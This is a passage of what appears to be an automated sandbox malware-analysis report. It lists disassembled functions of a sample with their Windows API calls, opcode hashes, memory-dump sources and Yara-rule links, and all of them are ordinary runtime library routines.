7ff767f0ba9d-7ff767f0baa0 538->540 541 7ff767f0baa2-7ff767f0baa9 538->541 539->537 540->537 541->537
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF767F0B2B0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF767F0B5EC), ref: 00007FF767F0B2DA
                                                                                    • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF767F0B71D), ref: 00007FF767F0B9C1
                                                                                    • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF767F0B71D), ref: 00007FF767F0BA05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 916d5d2bc06a167e78101b3390dc758e90f4b9f264f232b53cd73e79dafd9626
                                                                                    • Instruction ID: dde43a1fc1e5e273e072cff4a3b86749e2f6415efc94f5503b3b6250c1faa9c1
                                                                                    • Opcode Fuzzy Hash: 916d5d2bc06a167e78101b3390dc758e90f4b9f264f232b53cd73e79dafd9626
                                                                                    • Instruction Fuzzy Hash: 3E81E362A0C282C6E726AF2998709F9F791EB447C1FC84436CA9E07794DE3CE553C324
                                                                                    Function 00007FF767EF5CB0 Relevance: 3.1, APIs: 2, Instructions: 81COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bfb8fcdb40f2f7925395933c2a075e9459ae5b876a5129538ed71287851db8a9
                                                                                    • Instruction ID: 51c8002c7b0ca45f812099e8900dc864b8fb457a560055a2ab619db984102f19
                                                                                    • Opcode Fuzzy Hash: bfb8fcdb40f2f7925395933c2a075e9459ae5b876a5129538ed71287851db8a9
                                                                                    • Instruction Fuzzy Hash: 2A21F132B0A746C5EB257B51A4143BA93509B147E4FDC4632EE7D06BC2EE3DA4C78320
                                                                                    Function 00007FF767EF8140 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                    • String ID:
                                                                                    • API String ID: 3548387204-0
                                                                                    • Opcode ID: d1173a7212cc43d76dbf22b13eebf2488d25545fb6af3f24d076bbedaddb7772
                                                                                    • Instruction ID: f64f5ee2a710cbd88bbc4a199cfa5f1a551f4b05e7609a0ebb036e2dde7589ee
                                                                                    • Opcode Fuzzy Hash: d1173a7212cc43d76dbf22b13eebf2488d25545fb6af3f24d076bbedaddb7772
                                                                                    • Instruction Fuzzy Hash: D9119D20E09907C1FB5477B259326F997854FA13C5FD80535F90D86AC3EE2DB85B4232
                                                                                    Function 00007FF767EF7E98 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1173176844-0
                                                                                    • Opcode ID: cbf22f8cbf1717a2694491ed3b26a85d012a5bbbbd9548570d24cff125468d79
                                                                                    • Instruction ID: 07f72b6496ee9267274713597a90b95f909641169cd9406ee83323e00783c2f7
                                                                                    • Opcode Fuzzy Hash: cbf22f8cbf1717a2694491ed3b26a85d012a5bbbbd9548570d24cff125468d79
                                                                                    • Instruction Fuzzy Hash: 0EE0B660E1A60B81FB58716214352B483440F193F0EEC1B35FABD84AC2ED3CB89B8130
                                                                                    Function 00007FF767F05EF8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF767F05D75,?,?,00000000,00007FF767F05E2A), ref: 00007FF767F05F66
                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF767F05D75,?,?,00000000,00007FF767F05E2A), ref: 00007FF767F05F70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleLast
                                                                                    • String ID:
                                                                                    • API String ID: 918212764-0
                                                                                    • Opcode ID: c1e6758c4820c8c1252858a67302dddffb3f9881a80f9013a0a9caeb96fceeeb
                                                                                    • Instruction ID: 7d18c075904814711c2f6903a43d2a95802b274072ac1ee5e6f86d232bbaa4ff
                                                                                    • Opcode Fuzzy Hash: c1e6758c4820c8c1252858a67302dddffb3f9881a80f9013a0a9caeb96fceeeb
                                                                                    • Instruction Fuzzy Hash: DF219221B1C682C5FE507765A4B4EFD9392AF847D2F844235EA3E473C1CEACA4838320
                                                                                    Function 00007FF767F0F788 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: f805479e7f46c08dc78d13233d7981beb6879058a49b51030b1ad75e20a33afe
                                                                                    • Instruction ID: eba43c18349993c51da14771c09bc18813cfec167db70d4cd081f13455acb1a0
                                                                                    • Opcode Fuzzy Hash: f805479e7f46c08dc78d13233d7981beb6879058a49b51030b1ad75e20a33afe
                                                                                    • Instruction Fuzzy Hash: 4A217132618642C6D7A1AF18D460BA9B7E0AB85B95F944234EA5D477D9DF3CD4038B10
                                                                                    Function 00007FF767F003B0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: 9dd8857877f8d622ee8f1f9005da3086ec389f3c95e69244a29b813603ad10de
                                                                                    • Instruction ID: 088ff9db668c9208d03761c2f3155b6756c18962d6b3cc53bf10473f79ac3a97
                                                                                    • Opcode Fuzzy Hash: 9dd8857877f8d622ee8f1f9005da3086ec389f3c95e69244a29b813603ad10de
                                                                                    • Instruction Fuzzy Hash: 2A117221A2C642C6FB52BE119530BFDD790AF95BC1FD44031EA8C47786DEACE4039720
                                                                                    Function 00007FF767F0C144 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: b775fb37558cbe0d9f685a5aed90acce8f5692ab35a844819172b9af688f5e48
                                                                                    • Instruction ID: 25939c43b4d3fa9cb725b89461c8df001bb0baff426af7de2d15e97264804ab7
                                                                                    • Opcode Fuzzy Hash: b775fb37558cbe0d9f685a5aed90acce8f5692ab35a844819172b9af688f5e48
                                                                                    • Instruction Fuzzy Hash: 64115832A18682C6E310AB14A4709E9E7A4FB847D5FD90635EA5D57792CE3CE813CB30
                                                                                    Function 00007FF767EF7F10 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF767EF7F24
                                                                                      • Part of subcall function 00007FF767EF9E78: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF767EF9E80
                                                                                      • Part of subcall function 00007FF767EF9E78: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF767EF9E85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1208906642-0
                                                                                    • Opcode ID: 224b13c04430447bb356dc3f0809f92e7c82e594cc02aa9ed2c5e200abf5342b
                                                                                    • Instruction ID: cb1274db1736708cca61305ff9fad5eefd669617bdfc8e909056078b7a1b7f6b
                                                                                    • Opcode Fuzzy Hash: 224b13c04430447bb356dc3f0809f92e7c82e594cc02aa9ed2c5e200abf5342b
                                                                                    • Instruction Fuzzy Hash: 72E0B672D0D243C5FFA83A6151722F993810F213C5FD824B8F95E92983DD2D20AF5532
                                                                                    Function 00007FF767F062D4 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF767F04B06,?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000), ref: 00007FF767F06329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    • Opcode ID: 3297627f840d2d8a0acd794a5d79d3fc058ea66c42947bb30e921bb7862556ae
                                                                                    • Instruction ID: 5b1fb162426043a2d233c03f549cd6f866c797f4725ed4a2ac4a867c842df1ea
                                                                                    • Opcode Fuzzy Hash: 3297627f840d2d8a0acd794a5d79d3fc058ea66c42947bb30e921bb7862556ae
                                                                                    • Instruction Fuzzy Hash: D2F04914B1A203D5FE647A629A72AF8D3811F89BC2FC80434E90E863C1FE6CE4C35271
                                                                                    Function 00007FF767F08E50 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF767F0A09D,?,?,00000000,00007FF767F00CCF,?,?,?,00007FF767F0194B,?,?,?,00007FF767F01841), ref: 00007FF767F08E8E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    • Opcode ID: 7d8b04491be02a6a6a54ba2ac2cf4b3de713a8671e022013d4177b5f51218a88
                                                                                    • Instruction ID: d7daa515ba6316522c77c1da07be1c411b5e087aa5f8278958f16b3ff3eaf662
                                                                                    • Opcode Fuzzy Hash: 7d8b04491be02a6a6a54ba2ac2cf4b3de713a8671e022013d4177b5f51218a88
                                                                                    • Instruction Fuzzy Hash: 7AF03A10B19242C5FA643AA16871EF4D3805F84BE2FC80A34ED2E863C1DEACA4834131

                                                                                    Non-executed Functions

                                                                                    Function 00007FF767F0E138 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                    • String ID: utf8
                                                                                    • API String ID: 3069159798-905460609
                                                                                    • Opcode ID: d46c3db5fd79884ae430bdd4407c5728a58e5621258412781129b8267518e870
                                                                                    • Instruction ID: fe43958320aac2b0fb79ad80ec542d20d290fa9e14c2ee52c9ca4121bdbd067e
                                                                                    • Opcode Fuzzy Hash: d46c3db5fd79884ae430bdd4407c5728a58e5621258412781129b8267518e870
                                                                                    • Instruction Fuzzy Hash: 02918A36A08782C5EB24BB219471AF9A7A4EB84BC2F844135DA5C47796DF3CE553C321
                                                                                    Function 00007FF767F0EB80 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 2591520935-0
                                                                                    • Opcode ID: 4f671ca00f56fc9bf8997cbef9bac339960b0da77d1a639bb5ca6f39e128ec38
                                                                                    • Instruction ID: d7cf6bc21e63ae66d6747de50a7971dac5b8177290a791d22030bda10cf9886a
                                                                                    • Opcode Fuzzy Hash: 4f671ca00f56fc9bf8997cbef9bac339960b0da77d1a639bb5ca6f39e128ec38
                                                                                    • Instruction Fuzzy Hash: 5F713762B09652CAEB11BB60D870AF8B3A0AF44789F848535DE5D53795EF3DA447C320
                                                                                    Function 00007FF767EF8AB0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3140674995-0
                                                                                    • Opcode ID: c2016361b9a202e33e16e1aa200e640e5cdd72cb80c696406574d654a1428c77
                                                                                    • Instruction ID: 4074e9753023d313fe6ff718403104d65084d826bdfaa9dce2eeb7eba1e2afee
                                                                                    • Opcode Fuzzy Hash: c2016361b9a202e33e16e1aa200e640e5cdd72cb80c696406574d654a1428c77
                                                                                    • Instruction Fuzzy Hash: 77318D72608B81CAEB619F61E8507EDB360FB94798F84403ADA4D57B94DF3CD14AC720
                                                                                    Function 00007FF767EFF45C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1239891234-0
                                                                                    • Opcode ID: b756a912aeb3b57a49614e42f217d9f36913244dab77649a3db67ba06f605164
                                                                                    • Instruction ID: 52193b9f1a716b743e43e6b9e6fe4ccbbde6e8453254969aa6a9c040ba27577a
                                                                                    • Opcode Fuzzy Hash: b756a912aeb3b57a49614e42f217d9f36913244dab77649a3db67ba06f605164
                                                                                    • Instruction Fuzzy Hash: 7C316236608B81C6D765DF25E8506EEB3A0FB88798F940135EA9D43B54EF3CC54ACB10
                                                                                    Function 00007FF767EF7D74 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF767EF7DF7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 389471666-631824599
                                                                                    • Opcode ID: d67c635758605ed6479ea3d4b4b08c5c799a1697d5db29fb57afd5ba643e8a04
                                                                                    • Instruction ID: 527c7a328e631b8e8e3627b5df38ea323080748fcd09e51d6fe0ad584252052e
                                                                                    • Opcode Fuzzy Hash: d67c635758605ed6479ea3d4b4b08c5c799a1697d5db29fb57afd5ba643e8a04
                                                                                    • Instruction Fuzzy Hash: 5F118F32614B82D3F705AB22DA603B973A4FB44384FC44039D64D82A90EF3CE46AC760
                                                                                    Function 00007FF767EF8CFC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: 175403f887a107761204df3119ca0200cdd13c37828f298386d6700f57525c95
                                                                                    • Instruction ID: bf2bf17b04a6495c785351b848cf66099343505ad3bb6fc50a1af68b53581a3e
                                                                                    • Opcode Fuzzy Hash: 175403f887a107761204df3119ca0200cdd13c37828f298386d6700f57525c95
                                                                                    • Instruction Fuzzy Hash: C7114F32B14B01C9EB00DB60E8546B873A4FB59798F840E31EA2D46B64EF78D15A8350
                                                                                    Function 00007FF767EF6A04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatInfoLocaleMessage
                                                                                    • String ID: !x-sys-default-locale
                                                                                    • API String ID: 4235545615-2729719199
